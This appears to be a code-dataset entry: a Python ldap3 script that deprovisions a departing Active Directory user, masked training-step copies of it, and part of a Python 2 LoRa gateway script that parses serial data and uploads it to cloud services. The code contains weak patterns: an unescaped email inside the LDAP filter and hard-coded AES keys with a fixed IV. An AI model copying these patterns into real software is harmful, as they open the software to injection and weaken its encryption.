    """
    memberOf_list = []
    ad_info = get_secret("TS/Active-Directory-Offboarding-Info")
    # TODO: Get the info from the secret above and turn into env variables instead
    ad_info_dict = json.loads(ad_info)
    # Binding to AD with the latest form of TLS available
    tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.PROTOCOL_TLS)
    server = Server(FQDN, use_ssl=True, tls=tls_configuration)
    conn = Connection(server, ad_info_dict["sa_username_dn"], ad_info_dict["sa_password"], auto_bind=True,
                      raise_exceptions=True)
    # Find the user in AD based off of the 'mail' attribute
    search_filter = "(&(objectClass=user)(mail={}))".format(email)
    entry_generator = conn.extend.standard.paged_search(search_base=search_base,
                                                        search_filter=search_filter,
                                                        search_scope=SUBTREE,
                                                        attributes=['memberOf'],
                                                        paged_size=5,
                                                        generator=True)
    for entry in entry_generator:
        dn = entry['dn']
        relative_dn = dn.split(',')[0]
        groups = entry['raw_attributes']['memberOf']
        for group in groups:
            # raw_attributes values are bytes; [2:-1] strips the b'...'
            # wrapper of their string representation
            group_str = str(group)
            memberOf_list.append(group_str[2:-1])
    # There is a comment before each offboarding task. Comment out the ones you'd like to skip
    try:
        # Remove the user from every group it is a member of
        for group in memberOf_list:
            conn.extend.microsoft.remove_members_from_groups(dn, group)
        # Add user to security group (placeholder DN -- must be configured)
        conn.extend.microsoft.add_members_to_groups(dn, "<dn of new group>")
        # Disable account: userAccountControl 514 = NORMAL_ACCOUNT | ACCOUNTDISABLE.
        # NOTE(review): ldap3 normally expects (MODIFY_REPLACE, [value]) in the
        # changes dict -- confirm the bare (2, '514') tuple actually works.
        conn.modify(dn, changes={'userAccountControl': (2, '514')})
        # Move to a different OU (placeholder DN -- must be configured)
        conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior="<dn of new OU>")
        # Delete account
        ## TODO: Figure out the command to delete the AD account
        # Close connection
        conn.unbind()
        return "Success"
    except NameError:
        # NOTE(review): when no entry matched, 'dn' is unbound and its first
        # use raises UnboundLocalError -- a subclass of NameError -- so this
        # handler does catch the "no such user" case, but only by accident.
        return "A user with that email address does not exist inside Active Directory"
def __main__():
    """Prompt for the departing user's email and run the AD deprovisioning.

    NOTE: despite its name this function is never invoked automatically;
    a caller must run ``__main__()`` explicitly.
    """
    departing_email = input("Please input the departing user's email address: ")
    print(deprovision_AD(departing_email))
|
normal
|
{
"blob_id": "9ca5c052db43c1d8b0cafa18038b3ebcd80067f7",
"index": 4710,
"step-1": "<mask token>\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-2": "<mask token>\n\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret('TS/Active-Directory-Offboarding-Info')\n ad_info_dict = json.loads(ad_info)\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.\n PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n conn = Connection(server, ad_info_dict['sa_username_dn'], ad_info_dict[\n 'sa_password'], auto_bind=True, raise_exceptions=True)\n search_filter = '(&(objectClass=user)(mail={}))'.format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=\n search_base, search_filter=search_filter, search_scope=SUBTREE,\n attributes=['memberOf'], paged_size=5, generator=True)\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n try:\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n conn.extend.microsoft.add_members_to_groups(dn, '<dn of new group>')\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\n '<dn of new OU>')\n conn.unbind()\n return 'Success'\n except NameError:\n return (\n 'A user with that email address does not exist inside Active Directory'\n )\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-3": "<mask token>\nSSL_CERT_PATH = 'path/to/cert.pem'\nFQDN = 'ad.example.com'\nsearch_base = 'OU=Sites,DC=ad,DC=example,DC=com'\n\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret('TS/Active-Directory-Offboarding-Info')\n ad_info_dict = json.loads(ad_info)\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.\n PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n conn = Connection(server, ad_info_dict['sa_username_dn'], ad_info_dict[\n 'sa_password'], auto_bind=True, raise_exceptions=True)\n search_filter = '(&(objectClass=user)(mail={}))'.format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=\n search_base, search_filter=search_filter, search_scope=SUBTREE,\n attributes=['memberOf'], paged_size=5, generator=True)\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n try:\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n conn.extend.microsoft.add_members_to_groups(dn, '<dn of new group>')\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\n '<dn of new OU>')\n conn.unbind()\n return 'Success'\n except NameError:\n return (\n 'A user with that email address does not exist inside Active Directory'\n )\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-4": "import json\nimport os\nimport ssl\nfrom ldap3 import Server, Connection, Tls, SUBTREE, ALL\nSSL_CERT_PATH = 'path/to/cert.pem'\nFQDN = 'ad.example.com'\nsearch_base = 'OU=Sites,DC=ad,DC=example,DC=com'\n\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret('TS/Active-Directory-Offboarding-Info')\n ad_info_dict = json.loads(ad_info)\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.\n PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n conn = Connection(server, ad_info_dict['sa_username_dn'], ad_info_dict[\n 'sa_password'], auto_bind=True, raise_exceptions=True)\n search_filter = '(&(objectClass=user)(mail={}))'.format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=\n search_base, search_filter=search_filter, search_scope=SUBTREE,\n attributes=['memberOf'], paged_size=5, generator=True)\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n try:\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n conn.extend.microsoft.add_members_to_groups(dn, '<dn of new group>')\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\n '<dn of new OU>')\n conn.unbind()\n return 'Success'\n except NameError:\n return (\n 'A user with that email address does not exist inside Active Directory'\n )\n\n\ndef __main__():\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n",
"step-5": "import json\nimport os\n\nimport ssl\n\nfrom ldap3 import Server, Connection, Tls, SUBTREE, ALL\n\n# Include root CA certificate path if you use a self signed AD certificate\nSSL_CERT_PATH = \"path/to/cert.pem\"\n\n# Include the FQDN of your Domain Controller here\nFQDN = \"ad.example.com\"\n\n# Search base is the CN of the container where your users live\nsearch_base='OU=Sites,DC=ad,DC=example,DC=com'\n\ndef deprovision_AD(email):\n memberOf_list = []\n ad_info = get_secret(\"TS/Active-Directory-Offboarding-Info\")\n # TODO: Get the into from the secret above and turn into env variables instead\n ad_info_dict = json.loads(ad_info)\n\n # Binding to AD with latest form of TLS available\n tls_configuration = Tls(ca_certs_file=SSL_CERT_PATH, version=ssl.PROTOCOL_TLS)\n server = Server(FQDN, use_ssl=True, tls=tls_configuration)\n\n conn = Connection(server, ad_info_dict[\"sa_username_dn\"], ad_info_dict[\"sa_password\"], auto_bind=True,\n raise_exceptions=True)\n\n # Find user in AD based off of 'mail' attribute\n search_filter = \"(&(objectClass=user)(mail={}))\".format(email)\n entry_generator = conn.extend.standard.paged_search(search_base=search_base,\n search_filter=search_filter,\n search_scope=SUBTREE,\n attributes=['memberOf'],\n paged_size=5,\n generator=True)\n\n for entry in entry_generator:\n dn = entry['dn']\n relative_dn = dn.split(',')[0]\n groups = entry['raw_attributes']['memberOf']\n for group in groups:\n group_str = str(group)\n memberOf_list.append(group_str[2:-1])\n\n # There is a comment before each offboarding task. 
Comment out the ones you'd like to skip\n\n try:\n # Loop through groups and remove user from those groups\n for group in memberOf_list:\n conn.extend.microsoft.remove_members_from_groups(dn, group)\n\n # Add user to security group\n conn.extend.microsoft.add_members_to_groups(dn, \"<dn of new group>\")\n\n # Disable account\n conn.modify(dn, changes={'userAccountControl': (2, '514')})\n\n # Move to different OU\n conn.modify_dn(dn=dn, relative_dn=relative_dn, new_superior=\"<dn of new OU>\")\n\n # Delete account\n ## TODO: Figure out the command to delete the AD account\n\n # Close connection\n conn.unbind()\n return \"Success\"\n\n except NameError:\n return \"A user with that email address does not exist inside Active Directory\"\n\n\ndef __main__():\n # TODO: Figure out how to populate this as an env\n email = input(\"Please input the departing user's email address: \")\n ad_result = deprovision_AD(email)\n print(ad_result)\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#------------------------------------------------------------
# Copyright 2016 Congduc Pham, University of Pau, France.
#
# Congduc.Pham@univ-pau.fr
#
# This file is part of the low-cost LoRa gateway developped at University of Pau
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------
# IMPORTANT
# Parts that can be modified are identified with
#////////////////////////////////////////////////////////////
# TEXT
# END
#////////////////////////////////////////////////////////////
import sys
import select
import threading
from threading import Timer
import time
import datetime
import getopt
import os
import json
import re
#////////////////////////////////////////////////////////////
# ADD HERE BOOLEAN VARIABLES TO SUPPORT OTHER CLOUDS
# OR VARIABLES FOR YOUR OWN NEEDS
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#with firebase support?
#------------------------------------------------------------
_firebase=False
#------------------------------------------------------------
#with thingspeak support?
#------------------------------------------------------------
_thingspeak=False
#plot SNR (signal-to-noise ratio) instead of the packet sequence number
_thingspeaksnr=False
#------------------------------------------------------------
#with sensorcloud support?
#------------------------------------------------------------
_sensorcloud=False
#------------------------------------------------------------
#with grovestreams support?
#------------------------------------------------------------
_grovestreams=False
#------------------------------------------------------------
#with fiware support?
#------------------------------------------------------------
_fiware=False
#////////////////////////////////////////////////////////////
# ADD HERE APP KEYS THAT YOU WANT TO ALLOW FOR YOUR GATEWAY
#////////////////////////////////////////////////////////////
# NOTE: the format of the application key list has changed from
# a list of lists to a list of 4-byte strings, so that each appkey
# can be used as a dictionary key to look up per-application
# information such as the encryption key below.
app_key_list = [
	#for testing
	'****',
	#change here your application key
	'\x01\x02\x03\x04',
	'\x05\x06\x07\x08'
	]
#////////////////////////////////////////////////////////////
#FOR AES DECRYPTION
#////////////////////////////////////////////////////////////
#default 16-byte key, should match the end-device's key
aes_key="0123456789010123"
#default initialisation vector, should match the end-device's initialisation vector
aes_iv="\x9a\xd0\x30\x02\x00\x00\x00\x00\x9a\xd0\x30\x02\x00\x00\x00\x00"
#aes_iv="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
#per-application AES key, indexed by appkey (see app_key_list above)
appkey_aeskey = {
	'\x01\x02\x03\x04':"0123456789010123",
	'\x05\x06\x07\x08':"0123456789010123"
}
#per-application AES initialisation vector, indexed by appkey
appkey_aesiv = {
	'\x01\x02\x03\x04':"\x9a\xd0\x30\x02\x00\x00\x00\x00\x9a\xd0\x30\x02\x00\x00\x00\x00",
	'\x05\x06\x07\x08':"\x9a\xd0\x30\x02\x00\x00\x00\x00\x9a\xd0\x30\x02\x00\x00\x00\x00"
}
# END
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#header packet information
#------------------------------------------------------------
HEADER_SIZE=4
APPKEY_SIZE=4
#packet types
PKT_TYPE_DATA=0x10
PKT_TYPE_ACK=0x20
#flag bits carried in the packet-type byte
PKT_FLAG_ACK_REQ=0x08
PKT_FLAG_DATA_ENCRYPTED=0x04
PKT_FLAG_DATA_WAPPKEY=0x02
PKT_FLAG_DATA_ISBINARY=0x01
#------------------------------------------------------------
#information about the last received packet, updated from the
#gateway's ^p (packet) and ^r (radio) control lines
#------------------------------------------------------------
dst=0
ptype=0
ptypestr="N/A"
src=0
seq=0
datalen=0
SNR=0
RSSI=0
#radio settings of the last packet: bandwidth, coding rate, spreading factor
bw=0
cr=0
sf=0
#------------------------------------------------------------
#------------------------------------------------------------
#will ignore lines beginning with '?'
#------------------------------------------------------------
_ignoreComment=1
#------------------------------------------------------------
#with mongoDB support?
#------------------------------------------------------------
_mongodb = False
#------------------------------------------------------------
#log gateway message?
#------------------------------------------------------------
_logGateway=0
#------------------------------------------------------------
#raw output from gateway?
#------------------------------------------------------------
_rawFormat=0
#------------------------------------------------------------
_ourcustomFormat=0;
_lorawanFormat=0
#------------------------------------------------------------
#------------------------------------------------------------
#check for app key?
#------------------------------------------------------------
_wappkey=0
#------------------------------------------------------------
the_app_key = '\x00\x00\x00\x00'
#valid app key? by default we do not check for the app key
_validappkey=1
#------------------------------------------------------------
#for local AES decrypting
#------------------------------------------------------------
_aes=0
_hasClearData=0
#------------------------------------------------------------
#read local_conf.json to recover the gateway address
#------------------------------------------------------------
f = open(os.path.expanduser("local_conf.json"),"r")
lines = f.readlines()
f.close()
array = ""
#concatenate all the lines into a single string
for line in lines :
	array += line
#parse the JSON configuration
json_array = json.loads(array)
#gateway ID is used to build per-gateway log filenames below
_gwaddr = json_array["gateway_conf"]["gateway_ID"]
#////////////////////////////////////////////////////////////
# CHANGE HERE THE VARIOUS PATHS FOR YOUR LOG FILES
#////////////////////////////////////////////////////////////
_folder_path = "/home/pi/Dropbox/LoRa-test/"
_gwlog_filename = _folder_path+"gateway_"+str(_gwaddr)+".log"
_telemetrylog_filename = _folder_path+"telemetry_"+str(_gwaddr)+".log"
# END
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#initialize gateway DHT22 sensor
#------------------------------------------------------------
# dht22 value doubles as the sampling period in seconds (see dht22_target's
# time.sleep); 0/false disables the sensor entirely
_gw_dht22 = json_array["gateway_conf"]["dht22"]
_date_save_dht22 = None
if(_gw_dht22):
	print "Use DHT22 to get gateway temperature and humidity level"
	#make the dht22 reader importable, then import it
	sys.path.insert(0, os.path.expanduser('./sensors_in_raspi/dht22'))
	from read_dht22 import get_dht22_values
	_temperature = 0
	_humidity = 0
# retrieve dht22 values
def save_dht22_values():
	"""Read the gateway box's DHT22 sensor and record the values.

	Updates the module-level _temperature, _humidity and _date_save_dht22,
	and when MongoDB support is enabled stores a DATA_GW_DHT22 document.

	NOTE(review): the print/concatenations below treat _temperature and
	_humidity as strings, so get_dht22_values() presumably returns strings
	-- confirm against sensors_in_raspi/dht22/read_dht22.py.
	"""
	global _temperature, _humidity, _date_save_dht22
	_humidity, _temperature = get_dht22_values()
	_date_save_dht22 = datetime.datetime.utcnow()
	print "Gateway TC : "+_temperature+" C | HU : "+_humidity+" % at "+str(_date_save_dht22)
	#save values from the gateway box's DHT22 sensor, if _mongodb is true
	if(_mongodb):
		#build the payload as a JSON string
		str_json_data = "{\"th\":"+_temperature+", \"hu\":"+_humidity+"}"
		#creating the document to add
		doc = {
			"type" : "DATA_GW_DHT22",
			"gateway_eui" : _gwaddr,
			"node_eui" : "gw",
			"snr" : "",
			"rssi" : "",
			"cr" : "",
			"datarate" : "",
			"time" : _date_save_dht22,
			"data" : json.dumps(json.loads(str_json_data))
		}
		#adding the document
		add_document(doc)
def dht22_target():
	"""Daemon-thread body: sample the DHT22 sensor forever.

	NOTE(review): _gw_dht22 is used both as the enable flag and as the
	sampling period in seconds (time.sleep below) -- confirm this is
	intentional in local_conf.json. The 'global' declaration is only
	needed for reading the module-level value here.
	"""
	while True:
		print "Getting gateway temperature"
		save_dht22_values()
		sys.stdout.flush()
		global _gw_dht22
		time.sleep(_gw_dht22)
#------------------------------------------------------------
# Read-ahead line buffer used when input may be AES-encrypted:
# fillLinebuf() pre-reads n characters from stdin, and getSingleChar()
# serves characters from that buffer before falling back to stdin.
#------------------------------------------------------------
_linebuf="the line buffer"
_linebuf_idx=0
_has_linebuf=0

def getSingleChar():
	"""Return one character, consuming the read-ahead buffer first."""
	global _linebuf
	global _linebuf_idx
	global _has_linebuf
	if _has_linebuf==1:
		if _linebuf_idx < len(_linebuf):
			ch = _linebuf[_linebuf_idx]
			_linebuf_idx = _linebuf_idx + 1
			return ch
		# buffer exhausted: invalidate it and fall through to stdin
		_has_linebuf = 0
	return sys.stdin.read(1)

def getAllLine():
	"""Return the unread remainder of the buffer and invalidate it.

	The buffer contents are kept; only the index and validity flag reset.
	"""
	global _linebuf
	global _linebuf_idx
	global _has_linebuf
	remainder = _linebuf[_linebuf_idx:]
	_linebuf_idx = 0
	_has_linebuf = 0
	return remainder

def fillLinebuf(n):
	"""Pre-read n characters from stdin into the buffer and mark it valid."""
	global _linebuf
	global _linebuf_idx
	global _has_linebuf
	_linebuf = sys.stdin.read(n)
	_linebuf_idx = 0
	_has_linebuf = 1
#////////////////////////////////////////////////////////////
# ADD HERE OPTIONS THAT YOU MAY WANT TO ADD
# BE CAREFUL, IT IS NOT ADVISED TO REMOVE OPTIONS UNLESS YOU
# REALLY KNOW WHAT YOU ARE DOING
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#for parsing the options
#------------------------------------------------------------
def main(argv):
try:
opts, args = getopt.getopt(argv,'iftLam:',[\
'ignorecomment',\
'firebase',\
'thingspeak',\
'retrythsk',\
'thingspeaksnr',\
'fiware',\
'sensorcloud',\
'grovestreams',\
'loggw',\
'addr',\
'wappkey',\
'raw',\
'aes',\
'mongodb'])
except getopt.GetoptError:
print 'post_processing_gw '+\
'-i/--ignorecomment '+\
'-f/--firebase '+\
'-t/--thingspeak '+\
'--retrythsk '+\
'--thingspeaksnr '+\
'--fiware '+\
'--sensorcloud '+\
'--grovestreams '+\
'-L/--loggw '+\
'-a/--addr '+\
'--wappkey '+\
'--raw '+\
'--aes '+\
'-m/--mongodb'
sys.exit(2)
    # Dispatch each parsed command-line option. Most options flip a
    # module-level flag and lazily import the matching cloud backend so that
    # unused backends never have to be installed on the gateway.
    # NOTE(review): several tests below use `opt in ("--xxx")` where the
    # parenthesized operand is a plain string, not a 1-tuple, so `in` performs
    # SUBSTRING matching. It happens to work because getopt only yields full
    # option names, but `("--xxx",)` would be the safe spelling — TODO confirm.
    for opt, arg in opts:
        if opt in ("-i", "--ignorecomment"):
            # drop input lines starting with '?' (see main loop)
            print("will ignore commented lines")
            global _ignoreComment
            _ignoreComment = 1
        elif opt in ("-f", "--firebase"):
            print("will enable firebase support")
            global _firebase
            _firebase = True
            # lazy import: only pulled in when the backend is requested
            global firebase_uploadSingleData
            from FireBase import firebase_uploadSingleData
        elif opt in ("-t", "--thingspeak"):
            print("will enable thingspeak support")
            global _thingspeak
            _thingspeak = True
            global thingspeak_uploadSingleData, thingspeak_uploadMultipleData
            from ThingSpeak import thingspeak_uploadSingleData, thingspeak_uploadMultipleData
        elif opt in ("--retrythsk"):
            # enable upload retry inside the ThingSpeak helper module
            print("will enable thingspeak retry")
            global thingspeak_setRetry
            from ThingSpeak import thingspeak_setRetry
            #set retry to True
            thingspeak_setRetry(True)
        elif opt in ("--thingspeaksnr"):
            # plot the packet SNR on the second field instead of the sequence number
            print("will plot snr instead of seq")
            global _thingspeaksnr
            _thingspeaksnr = True
        elif opt in ("--fiware"):
            print("will enable fiware support")
            global _fiware
            _fiware = True
        elif opt in ("--sensorcloud"):
            print("will enable sensorcloud support")
            global _sensorcloud
            _sensorcloud = True
            global sensorcloud_uploadSingleData
            from SensorCloud import sensorcloud_uploadSingleData
        elif opt in ("--grovestreams"):
            print("will enable grovestreams support")
            global _grovestreams
            _grovestreams = True
            global grovestreams_uploadSingleData
            from GroveStreams import grovestreams_uploadSingleData
        elif opt in ("-L", "--loggw"):
            # log lines the gateway prefixes with ^$ into the gateway log file
            print("will log gateway message prefixed by ^$")
            global _logGateway
            _logGateway = 1
        elif opt in ("-a", "--addr"):
            # override the gateway address read from local_conf.json; it is
            # used to derive the gateway/telemetry log filenames
            global _gwaddr
            _gwaddr = arg
            print("overwrite: will use _"+str(_gwaddr)+" for gateway and telemetry log files")
        elif opt in ("--wappkey"):
            # require a known 4-byte app key before accepting logged data
            global _wappkey
            _wappkey = 1
            global _validappkey
            _validappkey=0
            print("will check for correct app key")
        elif opt in ("--raw"):
            # gateway forwards raw radio bytes; this script must dissect headers
            global _rawFormat
            _rawFormat = 1
            print("raw output from gateway. post_processing_gw will handle packet format")
        elif opt in ("--aes"):
            # enable local AES-CBC decryption of encrypted payloads
            global _aes
            _aes = 1
            global AES
            from Crypto.Cipher import AES
            print("enable AES encrypted data")
        elif opt in ("-m", "--mongodb"):
            # arg is the retention horizon in months for the local MongoDB store
            print("will enable local MongoDB support, max months to store is "+arg)
            global _mongodb
            _mongodb = True
            global add_document, remove_if_new_month, mongodb_set_max_months
            from MongoDB import add_document, remove_if_new_month, mongodb_set_max_months
            #setting max months
            mongodb_set_max_months(int(arg))
# END
#////////////////////////////////////////////////////////////
# Script entry point: parse the command-line options (this may enable the
# various cloud backends and set module-level flags used by the loop below).
if __name__ == "__main__":
    main(sys.argv[1:])

# Gateway DHT22 sensor: when enabled in local_conf.json, start a background
# thread that periodically samples the gateway box's temperature/humidity.
if (_gw_dht22):
    print "Starting thread to measure gateway temperature"
    t = threading.Thread(target=dht22_target)
    # daemon thread: must not keep the process alive when the main loop exits
    t.daemon = True
    t.start()

print "Current working directory: "+os.getcwd()
# Main processing loop: read the serial output of the lora_gateway program from
# stdin one character at a time and dispatch on a small set of line prefixes.
# Parsed per-packet metadata (dst/ptype/src/seq/datalen/SNR/RSSI and the radio
# settings bw/cr/sf) is cached in module globals by the '^p'/'^r' handlers and
# consumed later by the cloud-upload handlers.
while True:

    sys.stdout.flush()
    ch = getSingleChar()

    # expected prefixes
    #   ^p indicates a ctrl pkt info ^pdst(%d),ptype(%d),src(%d),seq(%d),len(%d),SNR(%d),RSSI=(%d) for the last received packet
    #      example: ^p1,16,3,0,234,8,-45
    #
    #   ^r indicate a ctrl radio info ^rbw,cr,sf for the last received packet
    #      example: ^r500,5,12
    #
    #   ^$ indicates an output (debug or log purposes) from the gateway that should be logged in the (Dropbox) gateway.log file
    #      example: ^$Set LoRa mode 4
    #
    #   ^l indicates a ctrl LAS info ^lsrc(%d),type(%d)
    #      type is 1 for DSP_REG, 2 for DSP_INIT, 3 for DSP_UPDT, 4 for DSP_DATA
    #      example: ^l3,4
    #
    #   \$ indicates a message that should be logged in the (Dropbox) telemetry.log file
    #      example: \$hello -> hello will be logged in the following format
    #               (src=3 seq=0 len=6 SNR=8 RSSI=-54) 2015-10-16T14:47:44.072230> hello
    #
    #   \& indicates a message that should be logged in the firebase cloud database
    #      example: \&hello -> hello will be logged in json format
    #
    #   \! indicates a message that should be logged on a thingspeak channel
    #      example: \!SGSH52UGPVAUYG3S#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at default field, i.e. field 1
    #               \!2#9.4 -> 9.4 will be logged in the default channel at field 2
    #               \!SGSH52UGPVAUYG3S#2#9.4 -> 9.4 will be logged in the SGSH52UGPVAUYG3S ThingSpeak channel at field 2
    #
    #   you can log other information such as src, seq, len, SNR and RSSI on specific fields
    #
    #   \xFF\xFE indicates radio data prefix
    #
    #
    #------------------------------------------------------------
    # '^' is reserved for control information from the gateway
    #------------------------------------------------------------
    if (ch=='^'):
        now = datetime.datetime.utcnow()
        ch=sys.stdin.read(1)

        # '^p': packet header info as 7 comma-separated ints; parse and cache
        # them in globals for the later cloud-upload handlers
        if (ch=='p'):
            data = sys.stdin.readline()
            print now.isoformat()
            print "rcv ctrl pkt info (^p): "+data,
            # Python 2 map() returns a list of the 7 int fields
            arr = map(int,data.split(','))
            print "splitted in: ",
            print arr
            dst=arr[0]
            ptype=arr[1]
            # build a human-readable packet-type string from the type nibble
            # (high 4 bits) and the flag bits (low 4 bits)
            ptypestr="N/A"
            if ((ptype & 0xF0)==PKT_TYPE_DATA):
                ptypestr="DATA"
                if (ptype & PKT_FLAG_DATA_ISBINARY)==PKT_FLAG_DATA_ISBINARY:
                    ptypestr = ptypestr + " IS_BINARY"
                if (ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY:
                    ptypestr = ptypestr + " WAPPKEY"
                if (ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED:
                    ptypestr = ptypestr + " ENCRYPTED"
                if (ptype & PKT_FLAG_ACK_REQ)==PKT_FLAG_ACK_REQ:
                    ptypestr = ptypestr + " ACK_REQ"
            if ((ptype & 0xF0)==PKT_TYPE_ACK):
                ptypestr="ACK"
            src=arr[2]
            seq=arr[3]
            datalen=arr[4]
            SNR=arr[5]
            RSSI=arr[6]
            # info_str is reused by the '\$' Dropbox and firebase handlers below
            if (_rawFormat==0):
                info_str="(dst=%d type=0x%.2X(%s) src=%d seq=%d len=%d SNR=%d RSSI=%d)" % (dst,ptype,ptypestr,src,seq,datalen,SNR,RSSI)
            else:
                info_str="rawFormat(len=%d SNR=%d RSSI=%d)" % (datalen,SNR,RSSI)
            print info_str
            # TODO: maintain statistics from received messages and periodically add these informations in the gateway.log file

        # '^r': radio settings (bandwidth, coding rate, spreading factor)
        if (ch=='r'):
            data = sys.stdin.readline()
            print "rcv ctrl radio info (^r): "+data,
            arr = map(int,data.split(','))
            print "splitted in: ",
            print arr
            bw=arr[0]
            cr=arr[1]
            sf=arr[2]
            info_str="(BW=%d CR=%d SF=%d)" % (bw,cr,sf)
            print info_str

        # '^t': timestamp line from the gateway; only echoed, not stored
        if (ch=='t'):
            rcv_timestamp = sys.stdin.readline()
            print "rcv timestamp (^t): "+rcv_timestamp

        if (ch=='l'):
            # TODO: LAS service
            print 'not implemented yet'

        # '^$': forward the gateway's own log line into the gateway log file
        # (only when enabled with -L/--loggw)
        if (ch=='$' and _logGateway==1):
            data = sys.stdin.readline()
            print "rcv gw output to log (^$): "+data,
            f=open(os.path.expanduser(_gwlog_filename),"a")
            f.write(now.isoformat()+'> ')
            f.write(data)
            f.close()
        continue

    #------------------------------------------------------------
    # '\' is reserved for message logging service
    #------------------------------------------------------------
    if (ch=='\\'):
        now = datetime.datetime.utcnow()

        # _validappkey was decided when the data prefix was processed below
        # (always 1 when --wappkey is not set)
        if _validappkey==1:

            print 'valid app key: accept data'

            ch=getSingleChar()

            if (ch=='$'): #log on Dropbox

                data = getAllLine()

                # append "<pkt info> <iso time>> <payload>" to the telemetry log
                print "rcv msg to log (\$) on dropbox: "+data,
                f=open(os.path.expanduser(_telemetrylog_filename),"a")
                f.write(info_str+' ')
                f.write(now.isoformat()+'> ')
                f.write(data)
                f.close()

            #/////////////////////////////////////////////////////////////
            # YOU CAN MODIFY HERE HOW YOU WANT DATA TO BE PUSHED TO CLOUDS
            # WE PROVIDE EXAMPLES FOR THINGSPEAK, GROVESTREAM
            # IT IS ADVISED TO USE A SEPERATE PYTHON SCRIPT PER CLOUD
            #////////////////////////////////////////////////////////////
            elif (ch=='&' and _firebase): #log on Firebase

                ldata = getAllLine()

                # NOTE(review): this print uses the stale 'data' variable (last
                # set by the ^p/\$ handlers) instead of the 'ldata' just read —
                # presumably a typo for ldata; verify before relying on it
                print 'rcv msg to log (\&) on firebase: '+data
                # packet metadata + payload bundled for the firebase upload
                firebase_msg = {
                    'dst':dst,
                    'type':ptypestr,
                    'gateway_eui' : _gwaddr,
                    'node_eui':src,
                    'seq':seq,
                    'len':datalen,
                    'snr':SNR,
                    'rssi':RSSI,
                    'cr' : cr,
                    'datarate' : "SF"+str(sf)+"BW"+str(bw),
                    'time':now.isoformat(),
                    'info_str':info_str+' '+now.isoformat()+'> '+ldata,
                    'data':ldata
                }

                if _mongodb :
                    #------------------
                    #saving in MongoDB
                    #------------------

                    # payload is expected as "nom1/val1/nom2/val2/..." —
                    # split into parallel nomenclature/value arrays
                    #get the data
                    data = ldata.split('/')

                    #change data in two arrays : nomenclature_array and value_array
                    iteration = 0
                    nomenclature_array = []
                    value_array = []
                    while iteration<len(data) :
                        if (iteration == 0 or iteration%2 == 0) :
                            nomenclature_array.append(data[iteration])
                        else :
                            value_array.append(data[iteration])
                        iteration += 1

                    #check if new month
                    remove_if_new_month(now)

                    print("MongoDB: saving the document in the collection...")

                    # re-serialize the pairs as a JSON object string,
                    # e.g. {"nom1" : val1, "nom2" : val2}
                    #saving data in a JSON var
                    str_json_data = "{"
                    iteration = 0
                    while iteration < len(nomenclature_array) :
                        #last iteration, do not add "," at the end
                        if iteration == len(nomenclature_array)-1 :
                            str_json_data += "\""+nomenclature_array[iteration]+"\" : "+value_array[iteration]
                        else :
                            str_json_data += "\""+nomenclature_array[iteration]+"\" : "+value_array[iteration]+", "
                        iteration += 1
                    str_json_data += "}"

